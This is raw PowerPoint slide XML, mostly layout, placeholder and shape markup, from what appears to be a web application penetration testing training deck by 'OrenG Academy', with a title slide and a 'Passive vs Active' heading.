              <a:gd name="connsiteY9" fmla="*/ 0 h 4067177"/>
              <a:gd name="connsiteX0" fmla="*/ 8412344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0 w 8412345"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 4067177"/>
              <a:gd name="connsiteX0" fmla="*/ 8412344 w 8412345"/>
              <a:gd name="connsiteY0" fmla="*/ 3524256 h 4067177"/>
              <a:gd name="connsiteX1" fmla="*/ 8412344 w 8412345"/>
              <a:gd name="connsiteY1" fmla="*/ 3752847 h 4067177"/>
              <a:gd name="connsiteX2" fmla="*/ 8412344 w 8412345"/>
              <a:gd name="connsiteY2" fmla="*/ 3524256 h 4067177"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8412345"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 4067177"/>
              <a:gd name="connsiteX4" fmla="*/ 8412345 w 8412345"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 4067177"/>
              <a:gd name="connsiteX5" fmla="*/ 8412345 w 8412345"/>
              <a:gd name="connsiteY5" fmla="*/ 4067177 h 4067177"/>
              <a:gd name="connsiteX6" fmla="*/ 1452936 w 8412345"/>
              <a:gd name="connsiteY6" fmla="*/ 4067177 h 4067177"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 8412345"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 4067177"/>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0 w 8412345"/>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345" h="4067177">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8412345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8412345" y="4067177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1452936" y="4067177"/>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 name="Picture Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98249CAB-AC39-4CCE-919B-8382181E4BB3}"/>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6D0E4AAB-0F04-4DBA-B80B-E677726620AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="4580547"/>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A252-50F4-A799-168D-BBE5669C38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3803D1-EDA4-60C0-6126-597AAB4F16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E93CA1-84BD-616C-A4C6-F280326A81AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30849802-3A3F-404D-36C8-63E3C4911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C8090-FD36-9821-E2B3-84D1135AB7B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24871678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2879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CDBF-722B-CC9A-5DA8-EBAB559DF1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6D5BF-4D38-AC91-6F44-C60F5C918D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3863B-8709-E27F-32B1-711B13637925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E0F4A7-BB60-6FF2-2106-0C2AFBF18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E6B28-44EF-5A3B-6DB9-3C978EBEC8DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2971575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8A1D-3D07-0CE0-DD18-42F4300773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F505D6-20C1-1FD5-6143-E4310874E9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D1397D-A00B-F5ED-DEB0-64F9B71964C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC499760-A9AB-C1BB-61C6-20579A800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F70B9-405F-C9DA-523D-1E41BCFAAEEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105289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9696-C161-5D19-43DB-D4D3B21A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76266-25DA-4CC3-6B1C-1C63F087BE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55BBA3-8FD8-CEA1-6ACD-272F0FC4E7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9E5B57-F3DE-8EC8-82D1-3CAE5C9FA416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B1B06D-1917-523A-B855-CB4A57C08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BE4D36-68B4-62BF-5502-6C6FD1CA17E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2109413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23ABB-0A26-4245-8BDA-1AB225A341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8CCE62-77D2-5B2D-229C-C908F67786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2D668B-8363-6EC6-C4BD-97D6A41149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B4D56B-D792-7D2B-51F0-52023088BD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C3C18B-99C0-45B0-645E-E0937C9025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F5CF0A-7ED4-0A4F-85CA-545B7A7825C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA17101E-253C-919A-B81A-9492DE6CA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913CBD-B210-8157-E1AB-85974D23AD05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62973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2B86-B677-6179-D6E3-2CCCD6AC6C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9520CC-FD8F-CF22-272D-D19DE0C571E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1B375B-EA11-B8B1-C5D1-E54BD2D9DE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518686-5E70-CEAC-20C6-C33CE49925DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2526875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97D220-E63A-030C-F32A-14C6531C952A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D361484-2749-7983-F74E-C0DD643D99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72BD8-5AC9-9EC8-891A-BE7B2B550875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7555623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773E2-BAA7-62F3-4105-1A0D402C15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87E24-566F-4CB2-6074-C51833F7C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BB0E3-D2D0-2BDF-E00E-4D31949FCA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16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2010BCC-3E99-90AA-029F-A09F791D3E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8C901A-B180-D84A-4695-86B935B60F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8C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376142199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79" r:id="rId7"/>
    <p:sldLayoutId id="2147483680" r:id="rId8"/>
    <p:sldLayoutId id="2147483682" r:id="rId9"/>
    <p:sldLayoutId id="2147483683" r:id="rId10"/>
    <p:sldLayoutId id="2147483684" r:id="rId11"/>
    <p:sldLayoutId id="2147483685" r:id="rId12"/>
    <p:sldLayoutId id="2147483686" r:id="rId13"/>
    <p:sldLayoutId id="2147483689" r:id="rId14"/>
    <p:sldLayoutId id="2147483687" r:id="rId15"/>
    <p:sldLayoutId id="2147483688" r:id="rId16"/>
    <p:sldLayoutId id="2147483671" r:id="rId17"/>
    <p:sldLayoutId id="2147483672" r:id="rId18"/>
    <p:sldLayoutId id="2147483704"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0.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3.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6.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2.xml"/><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34.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6.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.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39.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42.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43.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44.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46.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jpe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49.jpe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5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56.jpe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8.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57.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60.jpeg"/></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AF0D90FD-3E28-4722-97C4-8CCC735E8F08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184400" y="1469096"/>
            <a:ext cx="9486900" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-MY" altLang="ko-KR" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WEB APPLICATION PENETRATION TESTING</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12E22EC9-32B2-4C76-BCA0-9B27E0E418E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8608643" y="3110300"/>
            <a:ext cx="335927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Theory &amp; Hands On Training</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 2" descr="OrenG Academy">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46EE8DB1-1400-1E23-E792-0D0AF3B1E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9527" y="4658810"/>
            <a:ext cx="1355759" cy="485902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow>
              <a:schemeClr val="accent1">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>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6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Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6DED05-074D-EA97-166C-8DBC68B4FA22}"/>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531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600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PASSIVE VS ACTIVE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893C99A4-573A-4BB8-97D5-838DC408E12E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4806254" y="2640305"/>
            <a:ext cx="2599492" cy="2599492"/>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Block Arc 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B661184-A002-4439-B1A1-7B6EE89B02AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5061396" y="2895447"/>
            <a:ext cx="2089211" cy="2089211"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10800000"/>
              <a:gd name="adj2" fmla="val 21591085"/>
              <a:gd name="adj3" fmla="val 25572"/>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Block Arc 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D572AB-5FBD-4606-8E7B-A42925E7E8E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5061396" y="2895447"/>
            <a:ext cx="2089211" cy="2089211"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5394577"/>
              <a:gd name="adj2" fmla="val 16208807"/>
              <a:gd name="adj3" fmla="val 25571"/>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6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E18AE62-160A-4723-9000-7A167C8AC6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7420425" y="4004270"/>
            <a:ext cx="3837600" cy="921656"/>
            <a:chOff x="5896425" y="3794916"/>
            <a:chExt cx="2521384" cy="921656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Pentagon 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4EC145-4298-4FD7-8DD0-70522876A5F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5896425" y="3852519"/>
              <a:ext cx="2435851"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Pentagon 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD173860-C8AC-4712-92D8-1F6993A4F119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5981958" y="3794916"/>
              <a:ext cx="2435851" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B88E25-5F19-4B66-81FB-3FFB83F7F773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7420425" y="2917208"/>
            <a:ext cx="3837600" cy="921656"/>
            <a:chOff x="5896425" y="2812531"/>
            <a:chExt cx="2521384" cy="921656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Pentagon 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D747B980-68B9-40DA-8D1A-17795DF02F50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5896425" y="2877644"/>
              <a:ext cx="2454538" cy="85654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Pentagon 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBF72278-A8AF-4D95-9B61-95599F4C83EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5963271" y="2812531"/>
              <a:ext cx="2454538" cy="856543"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7E95F17-0E81-4E66-97AE-0CB9735A9EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="951345" y="2917210"/>
            <a:ext cx="3835924" cy="921655"/>
            <a:chOff x="727575" y="2812531"/>
            <a:chExt cx="2535694" cy="921655"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Pentagon 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB29469-3DF8-4066-8797-334DD30342DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="808731" y="2870133"/>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Pentagon 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85EA44C-1B98-41FB-ABC9-3B55F9BCA188}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
